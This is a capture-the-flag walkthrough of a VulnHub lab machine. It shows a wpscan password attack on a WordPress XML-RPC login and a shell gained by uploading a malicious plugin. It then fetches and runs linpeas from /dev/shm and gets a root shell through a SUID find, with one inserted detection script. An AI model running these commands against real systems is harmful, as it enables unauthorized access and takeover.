dobby needs to be root to help harry potter, dobby needs to be a free elf
Difficult: Easy
This works better in VirtualBox

This is HOGWARTS: DOBBY from VulnHub.


HTTP only; makes targeting easier.

HTTP and Rabbits

This one has a few rabbitholes, or at least red herrings. The page title on the website homepage is:


This decodes to:

too easy no? Potter

At the very bottom of the page in the source code is a comment:

See: /alohomora

If we go there, we get a message:

Draco’s password is his house ;)


Gobuster finds a directory called /log. It says:

hint --> /DiagonAlley

The base64 encoded string decodes to:


Going to /DiagonAlley, we find a WordPress installation. Maybe we’re getting somewhere?


Enumerate with:

wpscan -e --url

And we have one user, draco. We find a post entitled Dobby that is written in what appears to be Brainfuck, but running it through an interpreter only yields what might be a partial password, so this is another distraction. Let’s run a password attack:

wpscan --url -U 'draco' -P /usr/share/wordlists/rockyou.txt


[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin                                                                                                                     
Trying draco / slytherin Time: 00:18:42 <                                                               > (14930 / 14359323)  0.10%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: draco, Password: slytherin

Apparently the hint from /alohomora wasn’t a red herring. Whatever.
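
One way to spot the XML-RPC password attack shown above from the server side, as an added example that is not part of the original write-up: count POSTs to xmlrpc.php per client IP inside a sliding time window. The log lines, IP addresses, threshold and window are constructed assumptions, and the log is assumed to be in Apache/nginx combined format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined access-log prefix: client IP, timestamp, method, path, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def xmlrpc_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map each client IP to its peak count of POSTs to xmlrpc.php inside any
    `window`, for IPs that reach `threshold`. Lines must be in time order."""
    recent, peaks = defaultdict(deque), {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m["path"].split("?", 1)[0]
        # Failed XML-RPC logins typically still return HTTP 200,
        # so count requests rather than filtering on status code.
        if m["method"] != "POST" or not path.endswith("/xmlrpc.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop requests older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def constructed_log():
    """Constructed sample: one noisy client, one quiet client, one junk line."""
    t0 = datetime(2020, 11, 14, 8, 0, 0)
    row = '{} - - [{} +0000] "{} HTTP/1.1" 200 512 "-" "-"'
    stamp = lambda s: (t0 + timedelta(seconds=s)).strftime("%d/%b/%Y:%H:%M:%S")
    post = "POST /DiagonAlley/xmlrpc.php"
    log = [row.format("192.0.2.10", stamp(i), post) for i in range(40)]
    log += [row.format("198.51.100.7", stamp(40 + 300 * i), post) for i in range(3)]
    log += [row.format("192.0.2.10", stamp(1000), "GET /DiagonAlley/"), "not a log line"]
    return log

if __name__ == "__main__":
    for ip, peak in xmlrpc_bursts(constructed_log()).items():
        print(f"{ip}: {peak} XML-RPC POSTs within 60s")
```

If nothing on the site needs XML-RPC, blocking requests to xmlrpc.php at the web server removes this login path entirely; otherwise the same counter can feed a rate limit.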


The installation is in Spanish (I think) so it’s a bit hard to read but I can upload a malicious plugin as a zip file (see midnight for details). This gets me a shell.


As usual, run linpeas from /dev/shm after upgrading my shell:

www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ which python3
which python3
which python3
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'  
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ cd /home
www-data@HogWarts:/home/dobby$ cd /dev/shm
cd /dev/shm
www-data@HogWarts:/dev/shm$ wget
--2020-11-14 08:35:43--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 297851 (291K) [text/plain]
Saving to: ‘’          100%[===================>] 290.87K  --.-KB/s    in 0.05s   

2020-11-14 08:35:44 (5.41 MB/s) - ‘’ saved [297851/297851]

www-data@HogWarts:/dev/shm$ chmod +x
chmod +x
www-data@HogWarts:/dev/shm$ ./

This gives us not one but two SUID binaries of interest: base32 and find. We’ll take find, as per GTFOBins:

www-data@HogWarts:/dev/shm$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# whoami
# less proof.txt
less proof.txt

This box didn’t have cat but it still had head and less so no problem. Done and done.